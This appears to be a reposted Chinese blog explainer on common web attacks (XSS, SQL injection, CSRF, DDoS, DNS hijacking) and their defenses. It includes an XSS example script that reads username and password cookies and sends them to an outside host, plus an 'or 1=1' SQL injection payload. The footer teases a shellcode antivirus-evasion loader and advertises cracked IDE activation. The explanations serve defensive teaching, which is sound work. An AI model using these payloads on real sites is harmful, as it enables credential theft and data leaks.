sql注入攻击属于什么攻击_ssr怎么用

sql注入攻击属于什么攻击_ssr怎么用学好网络安全,以己之矛护己之盾

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

? XSS 攻击

  • 全称跨站脚本攻击 Cross Site Scripting
  • 为了与重叠样式表 CSS 进行区分,所以换了另一个缩写名称 XSS
  • XSS攻击者通过篡改网页,注入恶意的 HTML 脚本,一般是 javascript,在用户浏览网页时,控制用户浏览器进行恶意操作的一种攻击方式
  • XSS 攻击经常使用在论坛,博客等应用中。攻击者可以偷取用户Cookie、密码等重要数据,进而伪造交易、盗取用户财产、窃取情报等私密信息


sql注入攻击属于什么攻击_ssr怎么用

xss教学

  • 就像上图,如果用户在评论框中输入的并不是正常的文本,而是一段 javascript 脚本,而后台又没对该用户的数据进行处理,直接存入数据库,那么当其他用户过来访问该页面,浏览器必然会执行这段脚本
  • 当然这只是恶趣味,而真正的黑客并不会仅仅满足这样的恶趣味,可能更多的是想通过这些 注入脚本,获取你的 个人信息 ,甚至是你的账号密码等信息


sql注入攻击属于什么攻击_ssr怎么用

xss攻击

  • 由上图可知,用户其实在评论的时候,引入了一个第三方脚本,在这个脚本中获取你浏览器的 cookie 信息,并发送到指定的接口进行保存处理,这样你的信息就已经泄露了
// attack.js 中的逻辑
var uname = $.cookie('username'); // 获取账号
var pwd = $.cookie('password'); // 获取密码

// 发送请求
$('body').appendTo('<script src=`http://autofelix.com/index.php?username=${uname}&password=${pwd}`></script>');
  • 在上面逻辑中,脚本中获取了你的个人信息,并将你的个人信息发送到后端 php 文件中进行处理保存,这样你的个人信息就已经泄露了,所以杜绝 xss攻击 在网络安全中非常的重要
  • 所以后端永远不要相信用户提交的数据,在接收用户提交的信息时候,要进行 消毒处理
  • 也就是过滤一些特殊的字符,比如 javascript 脚本中的 <> 进行转移 <> 再进行存储,这样就能有效的进行 xss 攻击的预防
  • 另外如果 cookie 中设置了 HttpOnly 属性,那么通过 js 脚本将无法读取到cookie 信息,这样也能有效的防止 XSS 攻击窃取 cookie 内容


sql注入攻击属于什么攻击_ssr怎么用

xss攻击

? SQL 注入

  • SQL注入 攻击指的是攻击者在 HTTP 请求中注入恶意 SQL 命令,服务器用请求参数构造数据库 SQL 命令时,恶意 SQL 被一起构造,并在数据库中执行,以便得到数据库中的感兴趣的数据或对数据库进行读取、修改、删除、插入等敏感的操作,从而导致数据被随意篡改
  • 但是 SQL注入 攻击,需要攻击者对数据库表有所了解才行,比如你的项目 开源 了,不小心公开了数据库的账号和密码;另外你的网站上线没有 关闭调试模式,有心者可以网站的根据错误回显可以猜测表结构;另外还有就是 盲注,也即是很多有心者会盲猜数据表结构,但是这种难度最大
  • SQL注入 可以通过预编译手段进行预防,绑定参数是最好的防 SQL 注入方法。现在流行的框架基本都实现了 SQL预编译参数绑定,恶意攻击的 SQL 会被当做 SQL 的参数,而不是 SQL 命令被执行
# 正常获取用户信息的sql
select * from users where id=1

# sql注入了 1 or 1=1,就可以把用户表中的所有数据全部查出,导致数据泄露
select * from users where id=1 or 1=1


sql注入攻击属于什么攻击_ssr怎么用

SQL注入

? CSRF 攻击

  • CSRF 全称 Cross Site Request Forgery,跨站点请求伪造,攻击者通过跨站请求,以合法的用户身份进行非法操作,如转账交易、发表评论等。其核心是利用了浏览器 Cookie 或服务器的 Session 策略,盗取用户的身份信息
  • 在打开 A网站 的情况下,另开 Tab页面 打开恶意 网站B,此时在 B页面恶意意图 下,浏览器发起一个对 网站AHTTP 请求
  • 因为之前 A网站 已经打开了,浏览器存有 A网站 中的 Cookie 或其他用于身份认证的信息,这一次被 恶意意图 的请求,将会自动带上这些信息,这将会导致身份劫持,造成并非本人意愿的操作结果
  • 而对应 CSRF攻击 的防御策略有:表单token验证码Referer 检测


sql注入攻击属于什么攻击_ssr怎么用

CSRF攻击

? DDOS 攻击

  • DDOS 全称 Distributed Denial of Service,分布式拒绝服务攻击。是拒绝服务攻击的升级版。拒绝攻击服务其实就是让你的服务不能正常给用户提供服务,也就是俗话说的服务宕机。常用于攻击对外提供服务的服务器,像常见的:Web服务邮件服务DNS服务即时通讯服务 这些等
  • 在早期发起 DoS攻击 是一件很容易的事情,只需要写个程序让服务过载,无暇提供正常服务即可,也就是一秒中请求服务多次,将目标服务器的内存跑崩
  • 后来随着技术对发展,现在的服务器都是分布式,并不是单一服务器提供服务,一个服务背后拥有着是数不清的 CDN节点,也是就拥有着数不清的Web服务器。想靠单台服务器去攻击这种分布式网络,无异于对方以卵击石 ,而且现在很多 DDOS 攻击 都不是免费的,所以很容易造成偷鸡不成蚀把米
  • 防御手段:随着技术发展到今天也并不能完全杜绝这种攻击的出现,只能通过技术去缓解。其中包括:流量清洗SYN Cookie 等等


sql注入攻击属于什么攻击_ssr怎么用

DDoS攻击

? DNS 劫持

  • 当今互联网流量中,以 HTTP/HTTPS 为主的 Web服务 产生的流量占据了绝大部分
  • Web服务 发展的如火如荼,这背后离不开一个默默无闻的大功臣就是域名解析系统,DNS 提供将域名转换成 ip地址 的服务,每一个域名的解析都要经过 DNS ,所以可以看出它的重要性
  • 正是因为它的重要性,所以 DNS劫持 很容易被别有用心的人利用
  • 早期并没有考虑太多的安全性,所以导致 DNS 很容易被劫持
  • 如果攻击者篡改 DNS解析 设置,将域名由正常 IP 指向由攻击者控制的非法 IP,就会导致我们访问域名打开的却不是对应的网站,而是一个假冒或者别有用心的网站。这种攻击手段就是 DNS劫持
  • 通过 DNS劫持 简单点可以导致用户流失,严重的后果甚至惠将用户诱导至攻击者控制额非法网站,可能会造成银行卡号、手机号码、账号密码等重要信息的泄露
  • 后来出现了 DNSSEC 技术,虽然在一定程度上解决了劫持问题,但是国内并没有太多应用的案例,因此后来阿里、腾讯推出了 httpDNS 服务也一定程度上可以抑制这种攻击手段
  • 另外可以 安装SSL证书。SSL证书具备服务器身份认证功能,可以使DNS 劫持导致的连接错误情况及时被发现和终止


sql注入攻击属于什么攻击_ssr怎么用

DNS劫持

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/170846.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • 网页游戏开发(2)「建议收藏」

    网页游戏开发(2)「建议收藏」                      网页游戏开发(2)                                               作者:任尚益                      …

  • 起用与启用有什么区别_启用跟起用的区别

    起用与启用有什么区别_启用跟起用的区别"起用"与"启用":"起用"多用于与人有关,如"起用一代新人";"启用"一般用于与物有关,如&quo

  • webservice技术介绍

    一、WebService到底是什么?   一言以蔽之:WebService是一种跨编程语言和跨操作系统平台的远程调用技术。   所谓跨编程语言和跨操作平台,就是说服务端程序采用java编写,客户端程序则可以采用其他编程语言编写,反之亦然!跨操作系统平台则是指服务端程序和客户端程序可以在不同的操作系统上运行。    所谓远程调用,就是一台计算机a上的一个程序可以调用到另外一台

  • 2021python激活码_通用破解码[通俗易懂]

    2021python激活码_通用破解码,https://javaforall.cn/100143.html。详细ieda激活码不妨到全栈程序员必看教程网一起来了解一下吧!

  • exe免杀c语言,CobaltStrike shellcode免杀捆绑exe思路[通俗易懂]

    exe免杀c语言,CobaltStrike shellcode免杀捆绑exe思路[通俗易懂]这里演示的方式为shellcode框架加载自解压1.生成shellcode2.c加载(随便拉的加载器)#include#include#pragmacomment(linker,”/subsystem:\”windows\”/entry:\”mainCRTStartup\””)unsignedcharshellcode[]=”\xfc\xe8\x89\x00\x00\x00\x60\…

  • stm32f411中文手册(基于stm32f407)

    文章目录智能门锁一、项目背景二、项目功能要求三、元件准备四、项目设计(一)原理图设计(二)硬件设计(三)程序设计智能门锁资料链接:stm32智能门锁.rar哔哩哔哩项目展示视频:https://b23.tv/bxfxvd一、项目背景在消费升级渗透在各个领域的今天,国民消费发生着巨大的变化,与每个人息息相关的家居行业也是如此。现今,越来越多的智能家居产品出现在普通老百姓的生活中,智能照明、智能窗帘、智能扫地机器人等各种智能产品都给人们的生活带来了极大的便利。智能门锁作为智能家居中重要的一环,也成

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号